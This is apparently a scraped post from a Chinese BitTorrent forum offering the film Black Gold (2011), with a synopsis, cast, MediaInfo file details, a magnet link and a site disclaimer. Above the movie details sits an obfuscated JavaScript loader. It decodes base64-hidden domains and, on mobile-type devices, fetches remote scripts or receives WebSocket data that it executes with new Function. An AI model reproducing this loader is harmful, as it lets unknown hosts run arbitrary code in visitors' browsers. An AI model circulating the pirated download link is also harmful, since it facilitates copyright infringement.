黑金[双语字幕]Black.Gold.2011.1080p.BluRay.DTS.x265-10bit-迅雷下载 10.42GB

版主小s 20天前 248

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 黑金/Black Gold/Black Thirst/Day of the Falcon

◎片 名 Or noir

◎年 代 2011

◎产 地 法国,意大利,卡塔尔,突尼斯

◎类 别 剧情

◎语 言 英语

◎上映日期 2011-11-23(法国) / 2012-08-18(中国大陆)

◎IMDb评分 6.7/10 from 11444 users

◎IMDb链接 https://www.imdb.com/title/tt1701210/

◎豆瓣评分 7.4/10 from 6407 users

◎豆瓣链接 https://movie.douban.com/subject/5046033/

◎片 长 130分钟

◎导 演 让-雅克·阿诺 Jean-Jacques Annaud

◎编 剧 让-雅克·阿诺 Jean-Jacques Annaud / 门诺·迈依杰斯 Menno Meyjes / 汉斯·鲁斯克 Hans Ruesch / 阿兰·戈达尔 Alain Godard

◎主 演 芙蕾达·平托 Freida Pinto

安东尼奥·班德拉斯 Antonio Banderas

马克·斯特朗 Mark Strong

里兹·阿迈德 Riz Ahmed

塔哈·拉希姆 Tahar Rahim

莉亚·科贝德 Liya Kebede

克里·约翰逊 Corey Johnson

艾瑞克·艾伯纳尼 Eriq Ebouaney

阿金·加齐 Akin Gazi

◎标 签 阿拉伯 | 战争 | 法国 | 石油 | 沙漠战争 | 剧情 | 历史 | 2011

◎简 介

奥达(塔哈·拉希姆 Tahar Rahim 饰)和哥哥从小被寄养在纳萨比门下,纳萨比(安东尼奥·班德拉斯 Antonio Banderas 饰)在一次意外的发现了石油开掘后成为富甲一方的首领,逐渐与境外势力勾结,为了“黑金”置百姓与水深火热而不顾,并为了扩大权势将奥达与公主(芙蕾达·平托 Freida Pinto 饰)联姻。奥达的父亲带领阿拉伯平民,决心向纳萨比宣战,并鼓动自己的亲生儿子奥达的加入,但此刻纳萨比已占有高端军事武器,双方实力悬殊巨大。生性不好战的奥达挣扎在两个“父亲”、两个族群之间,不得不做出残酷的选择,为了百姓的生存与和平,与“不可战胜”的养父展开背水一战。

  1. General

  2. Unique ID : 78090608643064423586092984268867059006 (0x3ABFB4439328C984ED098B0228CD3D3E)

  3. Complete name : Black.Gold.2011.1080p.BluRay.DTS.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 10.4 GiB

  7. Duration : 2 h 10 min

  8. Overall bit rate : 11.5 Mb/s

  9. Movie name : Black Gold 2011 1080p BluRay DTS x265-10bit-HDS

  10. Encoded date : UTC 2021-07-05 23:26:30

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 2 h 10 min

  20. Bit rate : 9 889 kb/s

  21. Width : 1 920 pixels

  22. Height : 816 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.263

  30. Stream size : 8.99 GiB (86%)

  31. Title : @HDSky

  32. Writing library : x265 - H.265/HEVC codec

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 2 h 10 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 509 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 1.37 GiB (13%)

  50. Title : English

  51. Language : English

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. Format : PGS

  57. Muxing mode : zlib

  58. Codec ID : S_HDMV/PGS

  59. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  60. Duration : 2 h 4 min

  61. Bit rate : 33.1 kb/s

  62. Count of elements : 3076

  63. Stream size : 29.4 MiB (0%)

  64. Title : ENG

  65. Language : English

  66. Default : Yes

  67. Forced : No


  68. Text #2

  69. ID : 4

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 2 h 4 min

  75. Bit rate : 22.0 kb/s

  76. Count of elements : 2715

  77. Stream size : 19.5 MiB (0%)

  78. Title : CHS

  79. Language : Chinese

  80. Default : No

  81. Forced : No


  82. Text #3

  83. ID : 5

  84. Format : PGS

  85. Muxing mode : zlib

  86. Codec ID : S_HDMV/PGS

  87. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration : 2 h 4 min

  89. Bit rate : 22.2 kb/s

  90. Count of elements : 2715

  91. Stream size : 19.7 MiB (0%)

  92. Title : CHT

  93. Language : Chinese

  94. Default : No

  95. Forced : No


  96. Text #4

  97. ID : 6

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 2 h 4 min

  103. Bit rate : 37.7 kb/s

  104. Count of elements : 2715

  105. Stream size : 33.4 MiB (0%)

  106. Title : CHS&ENG

  107. Language : Chinese

  108. Default : No

  109. Forced : No


  110. Text #5

  111. ID : 7

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 2 h 4 min

  117. Bit rate : 37.9 kb/s

  118. Count of elements : 2715

  119. Stream size : 33.6 MiB (0%)

  120. Title : CHT&ENG

  121. Language : Chinese

  122. Default : No

  123. Forced : No


  124. Menu

  125. 00:00:00.000 : en:Chapter 01

  126. 00:08:13.576 : en:Chapter 02

  127. 00:10:43.184 : en:Chapter 03

  128. 00:17:04.440 : en:Chapter 04

  129. 00:21:30.456 : en:Chapter 05

  130. 00:24:54.743 : en:Chapter 06

  131. 00:32:44.504 : en:Chapter 07

  132. 00:40:26.924 : en:Chapter 08

  133. 01:00:24.120 : en:Chapter 09

  134. 01:23:13.363 : en:Chapter 10

  135. 02:00:11.913 : en:Chapter 11

  136. 02:08:21.277 : en:Chapter 12




TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:95AD7E084D2D5573E2D4F4704E7A71E96B8093AF
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回